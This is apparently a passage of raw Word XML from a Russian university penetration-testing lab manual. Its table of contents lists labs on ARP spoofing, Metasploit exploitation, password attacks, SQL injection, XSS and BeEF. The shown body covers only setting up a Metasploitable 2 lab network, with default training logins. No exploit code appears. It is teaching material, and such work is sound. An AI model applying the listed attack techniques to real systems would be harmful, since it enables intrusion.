                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CF7B6D"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CF7B6D" w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc107513720 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CF7B6D" w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CF7B6D"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CF7B6D" w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00CF7B6D"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21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1. Базовая конфигурация «Сканер-ВС» и Metasploitable 2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_Toc107513721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4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11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513722" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 2. Интернет-разведка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_Toc107513722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7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23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2.1. Применение Google в проектах по тестированию защищенности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_Toc107513723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7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24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2.2. Техническая разведка ИТ-инфраструктуры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_Toc107513724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12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11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513725" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 3. Поиск уязвимостей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_Toc107513725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16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26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3.1. Сканирование портов и поиск уязвимостей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_Toc107513726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16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27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3.2. Ручной поиск уязвимостей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_Toc107513727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25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28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3.3. Специализированные сканеры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_Toc107513728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29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11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513729" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 4. Эксплуатация уязвимостей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_Toc107513729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31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30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4.1. Проведение MITM-атаки с использованием ARP-спуфинга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_Toc107513730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31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31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4.2 Подбор эксплойтов с помощью веб-интерфейса «Сканер-ВС»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_Toc107513731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34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32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4.3. Использование командной строки  Metasploit для эксплуатации уязвимостей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_Toc107513732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37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33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4.4. Парольные атаки на СУБД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_Toc107513733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41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34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4.5. Парольные атаки на различные сервисы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_Toc107513734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47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11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513735" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 5. Эксплуатация уязвимостей в веб-приложениях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_Toc107513735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54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36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№5.1. Сканирование уязвимостей в веб-приложениях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_Toc107513736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54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37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5.2. Подбор паролей в веб-приложениях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_Toc107513737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56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38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5.3. Выполнение команд ОС через веб-приложение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_Toc107513738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62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39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5.4. SQL-инъекция и оффлайн-подбор паролей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_Toc107513739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67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40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5.5. Эксплуатация XSS-уязвимости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_Toc107513740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72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11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513741" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 6. Атаки на клиентское ПО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_Toc107513741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73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CF7B6D" w:rsidRPr="00DE2FD7" w:rsidRDefault="00CF7B6D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc107513742" w:history="1">
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Лабораторная работа № 6.1. Захват браузера с помощью BeeF</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:tab/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Pr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc107513742 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr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Pr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE2FD7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:rsidR="00E11CC9" w:rsidRDefault="00401AC4" w:rsidP="00E11CC9">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DE2FD7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt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Формированием учебно-методического пособия и проверкой лабораторных работ на практике занимались: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Студенты группы 161-371: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Иванов Александр Дмитриевич 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Чайчиц</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Анастасия Игоревна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Широкова Ольга Андреевна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Студенты группы 171-361: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Грабуздов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кирилл Эдуардович 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Ерошев</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Дмитрий Олегович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Захаркин</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Андрей Олегович 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Парасич</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Дарья Александровна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Актуализацией и редактированием учебно-методического пособия занимались:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Студенты группы 191-331:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мамонова Ксения Валентиновна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Шорников Андрей Валерьевич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Вся работа осуществлялась в рамках учебной деятельности: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Проектная деятельность – для студентов второго курса (171-361)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инженерный проект – для студентов третьего курса (161-371)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="000000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Проектная деятельность – для студентов третьего курса (191-331)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
        </w:pBd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Все материалы предоставлены компанией </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эшелон</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
        </w:pBd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Все материалы представлены строго в образовательных целях и не являются инструкциями для взлома.</w:t>
      </w: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1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc107507601"/>
      <w:bookmarkStart w:id="1" w:name="_Toc107513720"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Раздел 1. Введение в тестирование на проникновение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc107507602"/>
      <w:bookmarkStart w:id="3" w:name="_Toc107513721"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторная работа № 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовая конфигурация </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US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получить базовые навыки по конфигурации виртуальной среды и используемых в курсе операционных систем.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Задание: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запустить виртуальные машины:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00401AC4" w:rsidP="00401AC4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«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> (запу</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ск в ст</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">андартном режиме): для веб-интерфейса логин – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin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; пароль – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin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; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4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2: логин – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; пароль - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4">
      <w:pPr>
        <w:ind w:left="1418" w:hanging="425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(</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00EF49CB">
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://information.rapid7.com/download-metasploitable-2017-thanks.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4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Lubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: логин – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; пароль – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="00EF49CB">
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://lubuntu.ru/app.php/download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).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настроить сетевые соединения между узлами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00401AC4" w:rsidP="00401AC4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«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> (192.168.56.109);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4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 (192.168.56.110);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401AC4" w:rsidRPr="00401AC4" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4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Lubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (192.168.56.111).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="1418" w:firstLine="0"/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Замечание: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>данные IP адреса указаны в качестве примера, допускается использование других адресов.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проверить доступность узлов с помощью команды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ping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найти файлы, в имени которых присутствует слово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hydra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(команда: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find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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/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lastRenderedPageBreak/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1. Настроить на виртуальных машинах ти</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п подключения «Виртуальный адаптер хоста»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  <w:shd w:val="clear" w:color="auto" w:fill="F9CB9C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E09C120" wp14:editId="5742EBF9">
            <wp:extent cx="5283200" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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4706" cy="3665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2. Проверить работу соединения между виртуальными машинами при помощи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ping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71F5271" wp14:editId="07AAAE78">
            <wp:extent cx="5940115" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="356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9F3EDE9" wp14:editId="5DFAE5F3">
            <wp:extent cx="5961242" cy="1849328"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="32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64" cy="1852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3. Найти </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файлы</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
